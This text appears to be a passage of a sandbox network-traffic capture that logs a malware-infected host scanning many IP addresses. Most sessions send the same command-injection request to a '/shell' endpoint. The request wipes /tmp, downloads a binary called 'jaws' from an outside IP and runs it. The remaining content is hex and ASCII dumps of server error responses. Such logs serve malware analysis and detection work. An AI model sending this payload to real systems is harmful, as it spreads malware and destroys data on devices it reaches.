                                                          Jan 2, 2024 06:24:36.994118929 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                          Jan 2, 2024 06:24:36.994132996 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                          Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                          Jan 2, 2024 06:24:36.994144917 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                          Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                          Jan 2, 2024 06:24:36.994187117 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                          Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                          Jan 2, 2024 06:24:36.994201899 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to ns4.autocom.club's <a href="mailto:rheynielflores@
                                                          Jan 2, 2024 06:24:36.994213104 CET366INData Raw: 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c
                                                          Data Ascii: _medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copy


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          293192.168.2.235203844.237.242.20280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:36.865314007 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          294192.168.2.23380965.63.152.5980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:37.257342100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:37.524697065 CET1286INHTTP/1.0 403 Forbidden
                                                          Server: squid/3.1.10
                                                          Mime-Version: 1.0
                                                          Date: Tue, 02 Jan 2024 05:27:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3294
                                                          X-Squid-Error: ERR_ACCESS_DENIED 0
                                                          Vary: Accept-Language
                                                          Content-Language: en
                                                          X-Cache: MISS from dserver
                                                          X-Cache-Lookup: NONE from dserver:80
                                                          Via: 1.0 dserver (squid/3.1.10)
                                                          Connection: keep-alive
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#t
                                                          Jan 2, 2024 06:24:37.524714947 CET1286INData Raw: 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f
                                                          Data Ascii: itles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}/* General text */p {}/* error brief description */#error p {}/* some data which m
                                                          Jan 2, 2024 06:24:37.524940968 CET1113INData Raw: 31 32 37 2e 30 2e 30 2e 31 2f 73 68 65 6c 6c 3f 22 3e 68 74 74 70 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 2f 73 68 65 6c 6c 3f 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 41
                                                          Data Ascii: 127.0.0.1/shell?">http://127.0.0.1/shell?</a></p><blockquote id="error"><p><b>Access Denied.</b></p></blockquote><p>Access control configuration prevents your request from being allowed at this time. Please contact your service provider


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          295192.168.2.2360686154.213.63.23080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:37.365549088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:37.685703993 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          296192.168.2.236025045.169.136.280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:37.969433069 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:38.231623888 CET504INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          297192.168.2.2349486185.85.0.13980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:38.209928989 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:38.450619936 CET310INHTTP/1.1 400 Bad Request
                                                          Server: myracloud
                                                          Date: Tue, 02 Jan 2024 05:24:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 149
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 79 72 61 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Myra</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          298192.168.2.2360962104.125.2.9480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.594854116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.718425989 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 65 30 32 37 64 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 30 26 23 34 36 3b 35 65 66 63 61 33 34 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5e027d68&#46;1704173080&#46;5efca348</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          299192.168.2.2344204173.234.100.23080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.616364002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.767100096 CET413INHTTP/1.0 407 Proxy Authentication Required
                                                          Proxy-Authenticate: Basic realm="login"
                                                          Connection: close
                                                          Content-type: text/html; charset=utf-8
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          300192.168.2.234444823.7.184.25380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.620372057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.775767088 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 32 32 38 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 30 26 23 34 36 3b 36 32 38 66 62 65 32 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;7622817&#46;1704173080&#46;628fbe27</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          301192.168.2.235436035.160.3.14980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.650599003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.837640047 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          302192.168.2.2343532116.202.207.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.704653978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.944293976 CET427INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Server: Apache
                                                          X-Frame-Options: DENY
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          303192.168.2.2339714104.19.229.17680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.719393015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          304192.168.2.234693818.161.154.7680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.755404949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.894295931 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
